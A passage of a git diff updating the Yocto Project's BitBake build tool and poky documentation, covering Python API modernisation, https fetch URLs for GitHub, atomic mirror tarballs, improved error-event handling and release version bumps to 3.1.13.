index d1359f0100..cb0b3b3345 100644 --- a/poky/bitbake/lib/bb/event.py +++ b/poky/bitbake/lib/bb/event.py @@ -10,17 +10,17 @@ BitBake build tools. # SPDX-License-Identifier: GPL-2.0-only # -import sys -import pickle -import logging -import atexit -import traceback import ast +import atexit +import collections +import logging +import pickle +import sys import threading +import traceback -import bb.utils -import bb.compat import bb.exceptions +import bb.utils # This is the pid for which we should generate the event. This is set when # the runqueue forks off. @@ -56,7 +56,7 @@ def set_class_handlers(h): _handlers = h def clean_class_handlers(): - return bb.compat.OrderedDict() + return collections.OrderedDict() # Internal _handlers = clean_class_handlers() diff --git a/poky/bitbake/lib/bb/fetch2/git.py b/poky/bitbake/lib/bb/fetch2/git.py index 112b833f87..f6f6b63a74 100644 --- a/poky/bitbake/lib/bb/fetch2/git.py +++ b/poky/bitbake/lib/bb/fetch2/git.py @@ -67,6 +67,7 @@ import subprocess import tempfile import bb import bb.progress +from contextlib import contextmanager from bb.fetch2 import FetchMethod from bb.fetch2 import runfetchcmd from bb.fetch2 import logger @@ -140,6 +141,10 @@ class Git(FetchMethod): ud.proto = 'file' else: ud.proto = "git" + if ud.host == "github.com" and ud.proto == "git": + # github stopped supporting git protocol + # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git + ud.proto = "https" if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'): raise bb.fetch2.ParameterError("Invalid protocol type", ud.url) @@ -408,6 +413,20 @@ class Git(FetchMethod): bb.utils.remove(tmpdir, recurse=True) def build_mirror_data(self, ud, d): + + # Create as a temp file and move atomically into position to avoid races + @contextmanager + def create_atomic(filename): + fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename)) + try: + yield tfile + umask = os.umask(0o666) + os.umask(umask) + os.chmod(tfile, (0o666 & ~umask)) + os.rename(tfile, filename) + finally: + os.close(fd) + if ud.shallow and ud.write_shallow_tarballs: if not os.path.exists(ud.fullshallow): if os.path.islink(ud.fullshallow): @@ -418,7 +437,8 @@ class Git(FetchMethod): self.clone_shallow_local(ud, shallowclone, d) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone) + with create_atomic(ud.fullshallow) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone) runfetchcmd("touch %s.done" % ud.fullshallow, d) finally: bb.utils.remove(tempdir, recurse=True) @@ -427,7 +447,8 @@ class Git(FetchMethod): os.unlink(ud.fullmirror) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir) + with create_atomic(ud.fullmirror) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir) runfetchcmd("touch %s.done" % ud.fullmirror, d) def clone_shallow_local(self, ud, dest, d): diff --git a/poky/bitbake/lib/bb/fetch2/wget.py b/poky/bitbake/lib/bb/fetch2/wget.py index f7d1de26b7..5676d3fd27 100644 --- a/poky/bitbake/lib/bb/fetch2/wget.py +++ b/poky/bitbake/lib/bb/fetch2/wget.py @@ -319,7 +319,7 @@ class Wget(FetchMethod): except (TypeError, ImportError, IOError, netrc.NetrcParseError): pass - with opener.open(r) as response: + with opener.open(r, timeout=30) as response: pass except urllib.error.URLError as e: if try_again: diff --git a/poky/bitbake/lib/bb/msg.py b/poky/bitbake/lib/bb/msg.py index 2d88c4e72d..1b1a23bb50 100644 --- a/poky/bitbake/lib/bb/msg.py +++ b/poky/bitbake/lib/bb/msg.py @@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter): # loggerDefaultLogLevel = BBLogFormatter.NOTE -loggerDefaultVerbose = False -loggerVerboseLogs = False loggerDefaultDomains = {} def init_msgconfig(verbose, debug, debug_domains=None): """ Set default verbosity and debug levels config the logger """ - bb.msg.loggerDefaultVerbose = verbose - if verbose: - bb.msg.loggerVerboseLogs = True - if debug: bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1 elif verbose: diff --git a/poky/bitbake/lib/bb/persist_data.py b/poky/bitbake/lib/bb/persist_data.py index 7357ab2d44..56c983f816 100644 --- a/poky/bitbake/lib/bb/persist_data.py +++ b/poky/bitbake/lib/bb/persist_data.py @@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'. # import collections +import collections.abc +import contextlib +import functools import logging import os.path +import sqlite3 import sys import warnings -from bb.compat import total_ordering -from collections import Mapping -import sqlite3 -import contextlib +from collections.abc import Mapping sqlversion = sqlite3.sqlite_version_info if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): @@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): logger = logging.getLogger("BitBake.PersistData") -@total_ordering -class SQLTable(collections.MutableMapping): +@functools.total_ordering +class SQLTable(collections.abc.MutableMapping): class _Decorators(object): @staticmethod def retry(*, reconnect=True): diff --git a/poky/bitbake/lib/bb/process.py b/poky/bitbake/lib/bb/process.py index 2dc472a86f..24c588e533 100644 --- a/poky/bitbake/lib/bb/process.py +++ b/poky/bitbake/lib/bb/process.py @@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options): stderr = stderr.decode("utf-8") if pipe.returncode != 0: + if log: + # Don't duplicate the output in the exception if logging it + raise ExecutionError(cmd, pipe.returncode, None, None) raise ExecutionError(cmd, pipe.returncode, stdout, stderr) return stdout, stderr diff --git a/poky/bitbake/lib/bb/runqueue.py b/poky/bitbake/lib/bb/runqueue.py index 2d35d478a4..a513b0983b 100644 --- a/poky/bitbake/lib/bb/runqueue.py +++ b/poky/bitbake/lib/bb/runqueue.py @@ -1256,8 +1256,8 @@ class RunQueue: "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv, "sigdata" : bb.parse.siggen.get_taskdata(), "logdefaultlevel" : bb.msg.loggerDefaultLogLevel, - "logdefaultverbose" : bb.msg.loggerDefaultVerbose, - "logdefaultverboselogs" : bb.msg.loggerVerboseLogs, + "build_verbose_shell" : self.cooker.configuration.build_verbose_shell, + "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout, "logdefaultdomain" : bb.msg.loggerDefaultDomains, "prhost" : self.cooker.prhost, "buildname" : self.cfgData.getVar("BUILDNAME"), diff --git a/poky/bitbake/lib/bb/server/process.py b/poky/bitbake/lib/bb/server/process.py index b66fbe0acd..7b13576274 100644 --- a/poky/bitbake/lib/bb/server/process.py +++ b/poky/bitbake/lib/bb/server/process.py @@ -152,7 +152,8 @@ class ProcessServer(multiprocessing.Process): conn = newconnections.pop(-1) fds.append(conn) self.controllersock = conn - elif self.timeout is None and not ready: + + elif not self.timeout and not ready: print("No timeout, exiting.") self.quit = True @@ -347,7 +348,12 @@ class ServerCommunicator(): logger.info("No reply from server in 30s") if not self.recv.poll(30): raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)") - return self.recv.get() + ret, exc = self.recv.get() + # Should probably turn all exceptions in exc back into exceptions? + # For now, at least handle BBHandledException + if exc and "BBHandledException" in exc: + raise bb.BBHandledException() + return ret, exc def updateFeatureSet(self, featureset): _, error = self.runCommand(["setFeatures", featureset]) @@ -586,7 +592,7 @@ class BBUIEventQueue: self.reader = ConnectionReader(readfd) self.t = threading.Thread() - self.t.setDaemon(True) + self.t.daemon = True self.t.run = self.startCallbackHandler self.t.start() diff --git a/poky/bitbake/lib/bb/tests/event.py b/poky/bitbake/lib/bb/tests/event.py index 9229b63d47..9ca7e9bc8e 100644 --- a/poky/bitbake/lib/bb/tests/event.py +++ b/poky/bitbake/lib/bb/tests/event.py @@ -6,17 +6,18 @@ # SPDX-License-Identifier: GPL-2.0-only # -import unittest -import bb -import logging -import bb.compat -import bb.event +import collections import importlib +import logging +import pickle import threading import time -import pickle +import unittest from unittest.mock import Mock from unittest.mock import call + +import bb +import bb.event from bb.msg import BBLogFormatter @@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase): def _create_test_handlers(self): """ Method used to create a test handler ordered dictionary """ - test_handlers = bb.compat.OrderedDict() + test_handlers = collections.OrderedDict() test_handlers["handler1"] = self._test_process.handler1 test_handlers["handler2"] = self._test_process.handler2 return test_handlers @@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase): def test_clean_class_handlers(self): """ Test clean_class_handlers method """ - cleanDict = bb.compat.OrderedDict() + cleanDict = collections.OrderedDict() self.assertEqual(cleanDict, bb.event.clean_class_handlers()) diff --git a/poky/bitbake/lib/bb/tests/fetch.py b/poky/bitbake/lib/bb/tests/fetch.py index 6300f563f2..44dc0945a0 100644 --- a/poky/bitbake/lib/bb/tests/fetch.py +++ b/poky/bitbake/lib/bb/tests/fetch.py @@ -472,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest): super(GitDownloadDirectoryNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_dir = "git.openembedded.org.bitbake" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_dir = "github.com.openembedded.bitbake.git" self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40') @@ -520,7 +520,7 @@ class TarballNamingTest(FetcherTest): super(TarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz" self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1') @@ -554,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest): super(GitShallowTarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz" self.d.setVar('BB_GIT_SHALLOW', '1') @@ -921,7 +921,7 @@ class FetcherNetworkTest(FetcherTest): def test_git_submodule_dbus_broker(self): # The following external repositories have show failures in fetch and unpack operations # We want to avoid regressions! - url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" + url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -937,7 +937,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_CLI11(self): - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -952,12 +952,12 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_update_CLI11(self): """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """ - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # CLI11 that pulls in a newer nlohmann-json - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -971,7 +971,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_aktualizr(self): - url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" + url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -991,7 +991,7 @@ class FetcherNetworkTest(FetcherTest): """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """ # This repository also has submodules where the module (name), path and url do not align - url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699" + url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -1049,7 +1049,7 @@ class SVNTest(FetcherTest): bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir) # Github will emulate SVN. Use this to check if we're downloding... - bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .", + bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) bb.process.run("svn commit --non-interactive -m 'Add external'", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) @@ -1167,7 +1167,7 @@ class FetchLatestVersionTest(FetcherTest): test_git_uris = { # version pattern "X.Y.Z" - ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") + ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") : "1.99.4", # version pattern "vX.Y" # mirror of git.infradead.org since network issues interfered with testing @@ -1178,7 +1178,7 @@ class FetchLatestVersionTest(FetcherTest): ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "") : "1.0", # version pattern "pkg_name-vX.Y.Z" - ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") + ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") : "1.4.0", # combination version pattern ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "") @@ -1190,13 +1190,13 @@ class FetchLatestVersionTest(FetcherTest): : "20120614", # packages with a valid UPSTREAM_CHECK_GITTAGREGEX # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing - ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))") + ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))") : "0.4.3", - ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))") + ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))") : "11.0.0", - ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") + ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") : "1.3.59", - ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") + ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") : "3.82+dbg0.9", } @@ -1236,11 +1236,11 @@ class FetchLatestVersionTest(FetcherTest): # # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2 # https://github.com/apple/cups/releases - ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") + ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") : "2.0.0", # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz # http://ftp.debian.org/debian/pool/main/d/db5.3/ - ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") + ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") : "5.3.10", } @@ -1290,9 +1290,6 @@ class FetchCheckStatusTest(FetcherTest): "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz", "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz", "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz", - "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz", - "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz", - "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz", # GitHub releases are hosted on Amazon S3, which doesn't support HEAD "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz" ] @@ -1983,7 +1980,7 @@ class GitShallowTest(FetcherTest): @skipIfNoNetwork() def test_bitbake(self): - self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir) + self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir) self.git('config core.bare true', cwd=self.srcdir) self.git('fetch', cwd=self.srcdir) diff --git a/poky/bitbake/lib/bb/tinfoil.py b/poky/bitbake/lib/bb/tinfoil.py index 8c9b6b8ca5..ae69038952 100644 --- a/poky/bitbake/lib/bb/tinfoil.py +++ b/poky/bitbake/lib/bb/tinfoil.py @@ -465,7 +465,16 @@ class Tinfoil: commandline = [command] if params: commandline.extend(params) - result = self.server_connection.connection.runCommand(commandline) + try: + result = self.server_connection.connection.runCommand(commandline) + finally: + while True: + event = self.wait_event() + if not event: + break + if isinstance(event, logging.LogRecord): + if event.taskpid == 0 or event.levelno > logging.INFO: + self.logger.handle(event) if result[1]: raise TinfoilCommandFailed(result[1]) return result[0] diff --git a/poky/bitbake/lib/bb/ui/knotty.py b/poky/bitbake/lib/bb/ui/knotty.py index 87e873d644..e70c246400 100644 --- a/poky/bitbake/lib/bb/ui/knotty.py +++ b/poky/bitbake/lib/bb/ui/knotty.py @@ -380,14 +380,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent", "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"] +def drain_events_errorhandling(eventHandler): + # We don't have logging setup, we do need to show any events we see before exiting + event = True + logger = bb.msg.logger_create('bitbake', sys.stdout) + while event: + event = eventHandler.waitEvent(0) + if isinstance(event, logging.LogRecord): + logger.handle(event) + def main(server, eventHandler, params, tf = TerminalFilter): - if not params.observe_only: - params.updateToServer(server, os.environ.copy()) + try: + if not params.observe_only: + params.updateToServer(server, os.environ.copy()) - includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) + includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) - loglevel, _ = bb.msg.constructLogOptions() + loglevel, _ = bb.msg.constructLogOptions() + except bb.BBHandledException: + drain_events_errorhandling(eventHandler) + return 1 if params.options.quiet == 0: console_loglevel = loglevel diff --git a/poky/bitbake/lib/bb/ui/taskexp.py b/poky/bitbake/lib/bb/ui/taskexp.py index 2b246710ca..c00eaf6638 100644 --- a/poky/bitbake/lib/bb/ui/taskexp.py +++ b/poky/bitbake/lib/bb/ui/taskexp.py @@ -8,6 +8,7 @@ # import sys +import traceback try: import gi @@ -196,6 +197,7 @@ def main(server, eventHandler, params): gtkgui.start() try: + params.updateToServer(server, os.environ.copy()) params.updateFromServer(server) cmdline = params.parseActions() if not cmdline: @@ -218,6 +220,9 @@ def main(server, eventHandler, params): except client.Fault as x: print("XMLRPC Fault getting commandline:\n %s" % x) return + except Exception as e: + print("Exception in startup:\n %s" % traceback.format_exc()) + return if gtkthread.quit.isSet(): return diff --git a/poky/bitbake/lib/bb/utils.py b/poky/bitbake/lib/bb/utils.py index 5f5767c1da..fab16ffc58 100644 --- a/poky/bitbake/lib/bb/utils.py +++ b/poky/bitbake/lib/bb/utils.py @@ -16,7 +16,8 @@ import bb.msg import multiprocessing import fcntl import importlib -from importlib import machinery +import importlib.machinery +import importlib.util import itertools import subprocess import glob @@ -1584,7 +1585,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug(1, 'Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod logger.debug(1, 'Loading plugins from %s...' % pluginpath) diff --git a/poky/bitbake/lib/bblayers/action.py b/poky/bitbake/lib/bblayers/action.py index d6459d6617..d2f9c1bbde 100644 --- a/poky/bitbake/lib/bblayers/action.py +++ b/poky/bitbake/lib/bblayers/action.py @@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin): if not (args.force or notadded): try: self.tinfoil.run_command('parseConfiguration') - except bb.tinfoil.TinfoilUIException: + except (bb.tinfoil.TinfoilUIException, bb.BBHandledException): # Restore the back up copy of bblayers.conf shutil.copy2(backup, bblayers_conf) - bb.fatal("Parse failure with the specified layer added") + bb.fatal("Parse failure with the specified layer added, aborting.") else: for item in notadded: sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item) diff --git a/poky/bitbake/lib/bblayers/query.py b/poky/bitbake/lib/bblayers/query.py index e2cc310532..652a3acce0 100644 --- a/poky/bitbake/lib/bblayers/query.py +++ b/poky/bitbake/lib/bblayers/query.py @@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix. def print_item(f, pn, ver, layer, ispref): if not selected_layer or layer == selected_layer: if not bare and f in skiplist: - skipped = ' (skipped)' + skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason else: skipped = '' if show_filenames: @@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies. line = fnfile.readline() # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass - conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$") - inc_re = re.compile(".*\.inc$") + conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$") + inc_re = re.compile(r".*\.inc$") # The "inherit xxx" in .bbclass - bbclass_re = re.compile(".*\.bbclass$") + bbclass_re = re.compile(r".*\.bbclass$") for layerdir in self.bblayers: layername = self.get_layer_name(layerdir) for dirpath, dirnames, filenames in os.walk(layerdir): diff --git a/poky/bitbake/lib/hashserv/server.py b/poky/bitbake/lib/hashserv/server.py index 81050715ea..f38a22ad92 100644 --- a/poky/bitbake/lib/hashserv/server.py +++ b/poky/bitbake/lib/hashserv/server.py @@ -12,6 +12,7 @@ import math import os import signal import socket +import sys import time from . import chunkify, DEFAULT_MAX_CHUNK @@ -419,9 +420,14 @@ class Server(object): self._cleanup_socket = None def start_tcp_server(self, host, port): - self.server = self.loop.run_until_complete( - asyncio.start_server(self.handle_client, host, port, loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port, loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port) + ) for s in self.server.sockets: logger.info('Listening on %r' % (s.getsockname(),)) @@ -444,9 +450,14 @@ class Server(object): try: # Work around path length limits in AF_UNIX os.chdir(os.path.dirname(path)) - self.server = self.loop.run_until_complete( - asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path)) + ) finally: os.chdir(cwd) diff --git a/poky/bitbake/lib/layerindexlib/__init__.py b/poky/bitbake/lib/layerindexlib/__init__.py index 77196b408f..f30ee9e259 100644 --- a/poky/bitbake/lib/layerindexlib/__init__.py +++ b/poky/bitbake/lib/layerindexlib/__init__.py @@ -6,7 +6,6 @@ import datetime import logging -import imp from collections import OrderedDict from layerindexlib.plugin import LayerIndexPluginUrlError diff --git a/poky/documentation/conf.py b/poky/documentation/conf.py index 82fa325545..0d61afc9da 100644 --- a/poky/documentation/conf.py +++ b/poky/documentation/conf.py @@ -16,7 +16,8 @@ import os import sys import datetime -current_version = "3.1.10" +current_version = "3.1.13" +bitbake_version = "1.46" # String used in sidebar version = 'Version: ' + current_version @@ -82,7 +83,7 @@ extlinks = { # Intersphinx config to use cross reference with Bitbake user manual intersphinx_mapping = { - 'bitbake': ('https://docs.yoctoproject.org/bitbake/1.46', None) + 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None) } # -- Options for HTML output ------------------------------------------------- diff --git a/poky/documentation/poky.yaml b/poky/documentation/poky.yaml index 590af46ebd..8da5f5915d 100644 --- a/poky/documentation/poky.yaml +++ b/poky/documentation/poky.yaml @@ -1,11 +1,11 @@ -DISTRO : "3.1.10" +DISTRO : "3.1.13" DISTRO_NAME_NO_CAP : "dunfell" DISTRO_NAME : "Dunfell" DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus" -YOCTO_DOC_VERSION : "3.1.10" -YOCTO_DOC_VERSION_MINUS_ONE : "3.0.2" -DISTRO_REL_TAG : "yocto-3.1.10" -POKYVERSION : "23.0.10" +YOCTO_DOC_VERSION : "3.1.13" +YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4" +DISTRO_REL_TAG : "yocto-3.1.13" +POKYVERSION : "23.0.13" YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;" YOCTO_DL_URL : "https://downloads.yoctoproject.org" YOCTO_AB_URL : "https://autobuilder.yoctoproject.org" @@ -18,7 +18,8 @@ FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip pe diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \ ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \ python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \ - python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel" + python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \ + perl-File-Copy perl-locale" OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \ diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \ python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel diff --git a/poky/documentation/ref-manual/migration-3.0.rst b/poky/documentation/ref-manual/migration-3.0.rst index 047b75526f..50f7d697b0 100644 --- a/poky/documentation/ref-manual/migration-3.0.rst +++ b/poky/documentation/ref-manual/migration-3.0.rst @@ -184,8 +184,7 @@ The following BitBake changes have occurred. exceptions. Remove this argument in any calls to ``bb.build.exec_func()`` in custom classes or scripts. -- The - :term:`bitbake:BB_SETSCENE_VERIFY_FUNCTION2` +- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable is no longer used. In the unlikely event that you have any references to it, they should be removed. diff --git a/poky/documentation/ref-manual/ref-system-requirements.rst b/poky/documentation/ref-manual/ref-system-requirements.rst index d238dc454b..041f64c598 100644 --- a/poky/documentation/ref-manual/ref-system-requirements.rst +++ b/poky/documentation/ref-manual/ref-system-requirements.rst @@ -57,6 +57,8 @@ distributions: - Fedora 33 +- Fedora 34 + - CentOS 7.x - Debian GNU/Linux 8.x (Jessie) @@ -65,6 +67,8 @@ distributions: - Debian GNU/Linux 10.x (Buster) +- Debian GNU/Linux 11.x (Bullseye) + - OpenSUSE Leap 15.1 - OpenSUSE Leap 15.2 diff --git a/poky/documentation/ref-manual/ref-tasks.rst b/poky/documentation/ref-manual/ref-tasks.rst index 4ed15365f3..2f1959a010 100644 --- a/poky/documentation/ref-manual/ref-tasks.rst +++ b/poky/documentation/ref-manual/ref-tasks.rst @@ -331,22 +331,19 @@ file as a patch file: file://file;apply=yes \ " -Conversely, if you have a directory full of patch files and you want to -exclude some so that the ``do_patch`` task does not apply them during -the patch 